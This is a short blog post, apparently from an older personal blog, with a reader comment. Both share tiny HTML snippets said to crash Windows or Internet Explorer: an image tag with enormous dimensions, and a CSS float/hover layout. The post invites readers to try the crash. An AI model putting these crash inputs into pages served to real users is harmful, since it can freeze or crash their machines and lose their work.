Crashing Windows with HTML
This small HTML file will on some computers drive Windows into a blue screen:
<html>
<body>
<img src="image.jpg" width="9999999" height="9999999">
</body>
</html>
Try it out if you want by clicking here.
[via VoWe]
This small HTML file will on some computers drive Windows into a blue screen:
<html>
<body>
<img src="image.jpg" width="9999999" height="9999999">
</body>
</html>
Try it out if you want by clicking here.
[via VoWe]
No luck for me. Works fine in Firefox, and IE stopped responding, but I didn't get any bluescreen.
Try this with IE/Win:
<!DOCTYPE HTML>
<title>IE crash</title>
<style>
li { display:inline; }
a { float:left; clear:left; width:100%; }
a:hover { background:lime; color:black; }
</style>
<ul>
<li><a href="#">foo</a>
<li><a href="#">bar</a>
<li><a href="#">baz</a>
</ul>
© brain tags. Powered by Melody 1.0.1 using the DePo Clean Theme for Melody.
1 Comment